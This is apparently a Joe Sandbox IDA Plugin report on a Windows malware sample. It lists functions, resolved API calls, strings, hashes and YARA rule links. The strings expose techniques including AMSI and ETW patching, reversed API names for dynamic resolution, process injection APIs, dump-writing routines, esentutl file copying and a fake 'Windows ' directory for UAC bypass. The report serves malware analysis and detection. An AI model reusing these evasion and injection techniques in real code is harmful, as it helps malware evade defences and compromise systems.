Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: d0f02b2f9be4ac149336f09287d59d2b659a37e3ade0f9a40431d5afbb8f5c5e
Instruction ID: 0ab5f25292b77a57759a5c602a2f8f031e3c1594d1bc75c6d85eb316898c6c6b
Opcode Fuzzy Hash: d0f02b2f9be4ac149336f09287d59d2b659a37e3ade0f9a40431d5afbb8f5c5e
Instruction Fuzzy Hash: AD115B75680208AFEB06EFA4DD51EEFF7EEEB48700F619464B904D7640D630AA11CF60

Function 02EC7A3C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02EC81DC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02EC824C,?,?,00000000,?,02EC7A8E,ntdll,00000000,00000000,02EC7AD3,?,?,00000000), ref: 02EC821A
Part of subcall function 02EC81DC: GetModuleHandleA.KERNELBASE(?), ref: 02EC822E

Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02EC7AAF

Strings

ntdll, xrefs: 02EC7A84
yromeMlautriVetacollAwZ, xrefs: 02EC7A57

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: 0b3f16bf71b603cf2dc5622c1a2d86a8eaf6445eb6821afd6b1c08cc4a454cbd
Instruction ID: 381347c2ae71e882bb870bb8a97beaf5ffcec271a75435e28ee1ddd1b8c22634
Opcode Fuzzy Hash: 0b3f16bf71b603cf2dc5622c1a2d86a8eaf6445eb6821afd6b1c08cc4a454cbd
Instruction Fuzzy Hash: 59115B75680208AFEB06EFA4DD51EDFF7EEEB48700F619464B904D7640D630AA11CF60

Function 02EC7D88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02EC81DC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02EC824C,?,?,00000000,?,02EC7A8E,ntdll,00000000,00000000,02EC7AD3,?,?,00000000), ref: 02EC821A
Part of subcall function 02EC81DC: GetModuleHandleA.KERNELBASE(?), ref: 02EC822E

Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02EC7DFC

Strings

yromeMlautriVetirW, xrefs: 02EC7DA3
Ntdll, xrefs: 02EC7DD3

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 2719805696-3542721025
Opcode ID: e75cd66228a099303f8ca55638dd93565cf6d3d8959bbb4d79f79f573ebc0035
Instruction ID: 6275aa666af5d4298b82e66a34fc8127b3c2c24cb35207e28a030574e06699c6
Opcode Fuzzy Hash: e75cd66228a099303f8ca55638dd93565cf6d3d8959bbb4d79f79f573ebc0035
Instruction Fuzzy Hash: D3014CB6680208AFEB05EFE8DD51E9BF7EEEB49700F619858B904D7640D630AD11CF64

Function 02ECDBB4 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL(?,?), ref: 02ECDC30
RtlD.N(00000000,?,00000000,00000000,00000000,02ECDC82), ref: 02ECDC46
NtDeleteFile.NTDLL(?), ref: 02ECDC65

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: DeleteFileInitStringUnicode
String ID:
API String ID: 3559453722-0
Opcode ID: 5b7919ed9187391b083189a6bb13f273a831ba9123996392cdf0646aaa6bb7da
Instruction ID: 2b53119bac0f982d859deb18e31a51dafab501488b21ee44f5c0d0f70a39b82d
Opcode Fuzzy Hash: 5b7919ed9187391b083189a6bb13f273a831ba9123996392cdf0646aaa6bb7da
Instruction Fuzzy Hash: D70162759842086EEB05DBE0CE91FCD77BDAF44704F6194B6E200E7081DA75AB098B20

Function 02ECDC08 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02EB4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02EB4F2E

RtlInitUnicodeString.NTDLL(?,?), ref: 02ECDC30
RtlD.N(00000000,?,00000000,00000000,00000000,02ECDC82), ref: 02ECDC46
NtDeleteFile.NTDLL(?), ref: 02ECDC65

Part of subcall function 02EB4C60: SysFreeString.OLEAUT32(02ECF4A8), ref: 02EB4C6E

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: String$AllocDeleteFileFreeInitUnicode
String ID:
API String ID: 2841551397-0
Opcode ID: a0b0ee858e1da56ce0abe20979be9b26c97c9dcfa1f1eef82589ab1cc77bfb6d
Instruction ID: 943e05f712267774734c9f55c9c17a1e8a857556b16176345666f915dbd010fe
Opcode Fuzzy Hash: a0b0ee858e1da56ce0abe20979be9b26c97c9dcfa1f1eef82589ab1cc77bfb6d
Instruction Fuzzy Hash: 5101F87598420CBAD711EBE0DD51FCEB3BDDB44700F619475F600E3580EB756B058A64

Function 02EC6DD8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

Part of subcall function 02EC6D7C: CLSIDFromProgID.OLE32(00000000,?,00000000,02EC6DC9,?,?,?,00000000), ref: 02EC6DA9

CoCreateInstance.OLE32(?,00000000,00000005,02EC6EBC,00000000,00000000,02EC6E3B,?,00000000,02EC6EAB), ref: 02EC6E27

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 7d774b5db16f90e5885c9f0c716d6eb3980b38234879fc3a65d40654cec8e8be
Instruction ID: 20a10540b8f2aa58b02fa42c4fc46930715eee6a63c045bc3215aa07501dc2b3
Opcode Fuzzy Hash: 7d774b5db16f90e5885c9f0c716d6eb3980b38234879fc3a65d40654cec8e8be
Instruction Fuzzy Hash: 6E012B706887046EF711EFE0DD228AF7BBDDBC9B00F61983AF401E2650E6309E11C864

Function 02ECAD9C Relevance: 1.5, APIs: 1, Instructions: 17processCOMMON

Download Yara Rule

APIs

Part of subcall function 02ECAB20: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02ECADA7,?,?,02ECAE39,00000000,02ECAF15), ref: 02ECAB34
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02ECAB4C
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02ECAB5E
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02ECAB70
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02ECAB82
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02ECAB94
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02ECABA6
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02ECABB8
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02ECABCA
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02ECABDC
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02ECABEE
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02ECAC00
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02ECAC12
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02ECAC24
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02ECAC36
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02ECAC48
Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02ECAC5A

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,02ECAE39,00000000,02ECAF15), ref: 02ECADAD

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
String ID:
API String ID: 2242398760-0
Opcode ID: 5a47bcb1648fd3fb4811dbc945191ae34f23f91745483c17c86ca37c24748c11
Instruction ID: 9149f24bb59ec1afeb461fdd320b95e4accaac1e200c007dc540ef2b023c867c
Opcode Fuzzy Hash: 5a47bcb1648fd3fb4811dbc945191ae34f23f91745483c17c86ca37c24748c11
Instruction Fuzzy Hash: 0DC012B2641124168E2069F429844C2974EC9460FB3145872B504D2201D6254C129290

Function 02ED812C Relevance: 162.0, APIs: 5, Strings: 86, Instructions: 2778
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0302B7E0,0302B824,OpenSession,02F37380,02EDB7BC,UacScan,02F37380), ref: 02ED86ED
ResumeThread.KERNEL32(00000000,ScanBuffer,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,UacScan,02F37380,02EDB7BC,ScanBuffer,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC), ref: 02ED8D37
CloseHandle.KERNEL32(00000000,ScanBuffer,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,UacScan,02F37380,02EDB7BC,00000000,ScanBuffer,02F37380,02EDB7BC,OpenSession,02F37380), ref: 02ED8EB6

Part of subcall function 02EC895C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize,02F373A8,02ECA940,UacScan), ref: 02EC8970
Part of subcall function 02EC895C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02EC898A
Part of subcall function 02EC895C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize), ref: 02EC89C6

CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02F37380,02EDB7BC,UacInitialize,02F37380,02EDB7BC,ScanBuffer,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,UacScan,02F37380), ref: 02ED92A8

Part of subcall function 02EB7E6C: GetFileAttributesA.KERNEL32(00000000,?,02ED0423,ScanString,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,ScanString,02F37380,02EDB7BC,UacScan,02F37380,02EDB7BC,UacInitialize), ref: 02EB7E77

Part of subcall function 02ECDC90: RtlD.N(00000000,?,00000000,00000000,00000000,02ECDD62), ref: 02ECDCCF
Part of subcall function 02ECDC90: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02ECDD09
Part of subcall function 02ECDC90: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02ECDD36
Part of subcall function 02ECDC90: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02ECDD3F

Part of subcall function 02EC8348: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02EC83D2), ref: 02EC83B4

ExitProcess.KERNEL32(00000000,OpenSession,02F37380,02EDB7BC,ScanBuffer,02F37380,02EDB7BC,Initialize,02F37380,02EDB7BC,00000000,00000000,00000000,ScanString,02F37380,02EDB7BC), ref: 02EDB2FE

Strings

EnumServicesStatusExW, xrefs: 02EDA9E3
FlushInstructionCache, xrefs: 02EDABDC
ntdll, xrefs: 02ED922F, 02ED927F, 02ED9293, 02EDA62C, 02EDA65F, 02EDA692, 02EDA6C5, 02EDA6F8, 02EDAE99, 02EDAECC, 02EDAEFF, 02EDAF32, 02EDAF65, 02EDAF98, 02EDAFCB, 02EDAFFE, 02EDB031, 02EDB064, 02EDB097, 02EDB0CA, 02EDB0FD, 02EDB130, 02EDB163
UacScan, xrefs: 02ED8420, 02ED85A9, 02ED8702, 02ED88A8, 02ED8A35, 02ED8BC9, 02ED8D48, 02ED8FBF, 02ED942D, 02ED9647, 02ED9828, 02ED99C1, 02ED9BF7, 02EDAA67
NtQuerySystemInformation, xrefs: 02EDA97A
dbgcore, xrefs: 02ED9257, 02ED926B
BCryptVerifySignature, xrefs: 02EDA2AA
MiniDumpWriteDump, xrefs: 02ED9252
tquery, xrefs: 02EDA0CA
psapi, xrefs: 02EDA9F7
GetProcessMemoryInfo, xrefs: 02EDA14C
sppc, xrefs: 02ED9E8A, 02ED9EBD, 02ED9EF0, 02ED9F23, 02EDAE33, 02EDAE66
NtMapViewOfSection, xrefs: 02EDAF81
NtCreateSection, xrefs: 02EDAF4E
NtOpenObjectAuditAlarm, xrefs: 02ED922A
CryptSIPVerifyIndirectData, xrefs: 02EDA17F
NtGetWriteWatch, xrefs: 02EDAE82
SLLoadApplicationPolicies, xrefs: 02ED9F0C
Initialize, xrefs: 02ED81B4, 02ED83A4, 02ED93B1, 02ED9FC1, 02EDA35F, 02EDA88E, 02EDAC48, 02EDB194
I_QueryTagInformation, xrefs: 02ED923E
OpenProcess, xrefs: 02EDAB76
CreateProcessAsUserW, xrefs: 02EDAA2E, 02EDAA4C
LdrLoadDll, xrefs: 02EDB04D
NtOpenSection, xrefs: 02EDAF1B
DlpGetArchiveFileTraceInfo, xrefs: 02EDA4B7
UacInitialize, xrefs: 02ED9133, 02ED954F
SLGetEncryptedPIDEx, xrefs: 02EDAE4F
DlpGetWebSiteAccess, xrefs: 02EDA4EA
OpenSession, xrefs: 02ED8138, 02ED82AC, 02ED8328, 02ED8625, 02ED877E, 02ED8924, 02ED8AB1, 02ED8C45, 02ED8DC4, 02ED8EC7, 02ED903B, 02ED92B9, 02ED94A9, 02ED979A, 02ED9920, 02ED9B7B, 02ED9D81, 02ED9F45, 02EDA234, 02EDA2E3, 02EDA523, 02EDA71A, 02EDA812, 02EDACC4, 02EDB28C
VirtualAllocEx, xrefs: 02EDAB10
DlpCheckIsCloudSyncApp, xrefs: 02EDA484
NtOpenFile, xrefs: 02EDB0E6
endpointdlp, xrefs: 02EDA468, 02EDA49B, 02EDA4CE, 02EDA501
NtQuerySecurityObject, xrefs: 02EDAFE7
EnumServicesStatusW, xrefs: 02EDA9C5
VirtualAlloc, xrefs: 02EDAADD
SLGetGenuineInformation, xrefs: 02ED9E73
NtOpenProcess, xrefs: 02ED928E
advapi32, xrefs: 02ED9243
Kernel32, xrefs: 02EDAA06, 02EDAA15, 02EDAA51
CreateProcessAsUserA, xrefs: 02EDAA1F
LdrGetProcedureAddress, xrefs: 02EDB080
NtAlertResumeThread, xrefs: 02EDA615
Advapi, xrefs: 02EDA9BB, 02EDA9CA, 02EDA9D9, 02EDA9E8, 02EDAA24, 02EDAA33, 02EDAA42
EnumServicesStatusA, xrefs: 02EDA9B6
NtAccessCheck, xrefs: 02EDB01A
spp, xrefs: 02EDA0FD, 02EDA130, 02EDADCD
WriteVirtualMemory, xrefs: 02EDABA9
NtReadVirtualMemory, xrefs: 02EDAFB4
RtlQueryProcessDebugInformation, xrefs: 02EDA9A7
CreateProcessA, xrefs: 02EDAA01
mssip32, xrefs: 02EDA196
VirtualProtect, xrefs: 02EDAB43
CreateProcessW, xrefs: 02EDAA10
ScanBuffer, xrefs: 02ED852D, 02ED87FA, 02ED89A0, 02ED8B2D, 02ED8CC1, 02ED8E40, 02ED90B7, 02ED91AF, 02ED95CB, 02ED98A4, 02ED9A3D, 02ED9C73, 02ED9D05, 02EDA03D, 02EDA3DB, 02EDA90A, 02EDB210
NtWaitForSingleObject, xrefs: 02EDA67B
EtwEventWrite, xrefs: 02EDB14C
C:\Windows\System32\, xrefs: 02ED86B7
SetUnhandledExceptionFilter, xrefs: 02EDAC0F
EnumProcessModules, xrefs: 02EDA9F2
psapi, xrefs: 02EDA163
NtWriteVirtualMemory, xrefs: 02EDB0B3
DllGetClassObject, xrefs: 02EDA119, 02EDADE9
NtDeviceIoControlFile, xrefs: 02EDA989
NtQueryDirectoryFile, xrefs: 02EDA998
EnumServicesStatusExA, xrefs: 02EDA9D4
NtSetSecurityObject, xrefs: 02ED927A
SLIsGenuineLocalEx, xrefs: 02ED9ED9
kernel32, xrefs: 02EDAAF4, 02EDAB27, 02EDAB5A, 02EDAB8D, 02EDABC0, 02EDABF3, 02EDAC26
bcrypt, xrefs: 02EDA2C1
sppwmi, xrefs: 02EDAE00
SLGetSLIDList, xrefs: 02ED9EA6
MZP, xrefs: 02ED9996
NtQueryVirtualMemory, xrefs: 02EDAEB5
EtwEventWriteEx, xrefs: 02EDB119
Ntdll, xrefs: 02EDA97F, 02EDA98E, 02EDA99D, 02EDA9AC
MiniDumpReadDumpStream, xrefs: 02ED9266
DlpNotifyPreDragDrop, xrefs: 02EDA451
RtlCreateQueryDebugBuffer, xrefs: 02EDA6E1
SLGatherMigrationBlob, xrefs: 02EDAE1C
ScanString, xrefs: 02ED8230, 02ED849C, 02ED8F43, 02ED9335, 02ED971E, 02ED9AFF, 02ED9DFD, 02EDA1B8, 02EDA59F, 02EDA796, 02EDAD40
SxTracerGetThreadContextDebug, xrefs: 02EDA0E6, 02EDADB6
RtlAllocateHeap, xrefs: 02EDA648, 02EDA6AE
CreateProcessWithLogonW, xrefs: 02EDAA3D
NtQueryInformationThread, xrefs: 02EDAEE8
RetailTracerEnable, xrefs: 02EDA0B3

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: CloseFile$CreateHandleLibraryProcess$AddressAttributesCacheExitFlushFreeInstructionLoadProcResumeThreadUserWrite
String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
API String ID: 304482832-3738268246
Opcode ID: 8dd5cde29277971bf0b3deadc2600222c4699b0d42c8c7aa02fe79afee42f2b7
Instruction ID: e9228d0790d3a5d9fec8526887c119f5595ecb0ee7afe9c76cfff33fea283f2a
Opcode Fuzzy Hash: 8dd5cde29277971bf0b3deadc2600222c4699b0d42c8c7aa02fe79afee42f2b7
Instruction Fuzzy Hash: E243ED35A8012D8BDB12EB64DD919CE73BAFF84344F10E1A9F409AB255DB30AE52CF51

Function 02ED3E16 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2804
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02ECDC90: RtlD.N(00000000,?,00000000,00000000,00000000,02ECDD62), ref: 02ECDCCF
Part of subcall function 02ECDC90: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02ECDD09
Part of subcall function 02ECDC90: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02ECDD36
Part of subcall function 02ECDC90: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02ECDD3F

Sleep.KERNEL32(000003E8,ScanBuffer,02F37380,02EDB7BC,UacScan,02F37380,02EDB7BC,ScanString,02F37380,02EDB7BC,02EDBB34,00000000,00000000,02EDBB28,00000000,00000000), ref: 02ED40CF

Part of subcall function 02EC88C8: LoadLibraryW.KERNEL32(amsi), ref: 02EC88D1
Part of subcall function 02EC88C8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02EC8930

Sleep.KERNEL32(000003E8,ScanBuffer,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,UacScan,02F37380,02EDB7BC,000003E8,ScanBuffer,02F37380,02EDB7BC,UacScan,02F37380), ref: 02ED427B

Part of subcall function 02EC895C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize,02F373A8,02ECA940,UacScan), ref: 02EC8970
Part of subcall function 02EC895C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02EC898A
Part of subcall function 02EC895C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize), ref: 02EC89C6

Sleep.KERNEL32(00004E20,UacScan,02F37380,02EDB7BC,ScanString,02F37380,02EDB7BC,ScanBuffer,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,UacInitialize,02F37380,02EDB7BC), ref: 02ED50F2

Part of subcall function 02ECDC08: RtlInitUnicodeString.NTDLL(?,?), ref: 02ECDC30
Part of subcall function 02ECDC08: RtlD.N(00000000,?,00000000,00000000,00000000,02ECDC82), ref: 02ECDC46
Part of subcall function 02ECDC08: NtDeleteFile.NTDLL(?), ref: 02ECDC65

Part of subcall function 02EB7E6C: GetFileAttributesA.KERNEL32(00000000,?,02ED0423,ScanString,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,ScanString,02F37380,02EDB7BC,UacScan,02F37380,02EDB7BC,UacInitialize), ref: 02EB7E77

Part of subcall function 02EC85CC: WinExec.KERNEL32(?,?), ref: 02EC8634

Strings

C:\\Windows\\System32\\esentutl.exe /y , xrefs: 02ED64AE
UacScan, xrefs: 02ED3F83, 02ED40E0, 02ED428C, 02ED440F, 02ED45E0, 02ED46BE, 02ED4853, 02ED4D14, 02ED507D, 02ED53F7, 02ED5B93, 02ED6103, 02ED62C8, 02ED65EE, 02ED66FB, 02ED6959, 02ED6A51
[InternetShortcut], xrefs: 02ED6D4C
C:\\Windows \\SysWOW64\\per.exe, xrefs: 02ED43F9
UacUninitialize, xrefs: 02ED3E22, 02ED4642, 02ED4C98, 02ED537B
C:\Users\Public\CApha.exe, xrefs: 02ED5504
/o, xrefs: 02ED64C4
UacInitialize, xrefs: 02ED4A48, 02ED4E88, 02ED5103, 02ED5540, 02ED58F6, 02ED5DE3
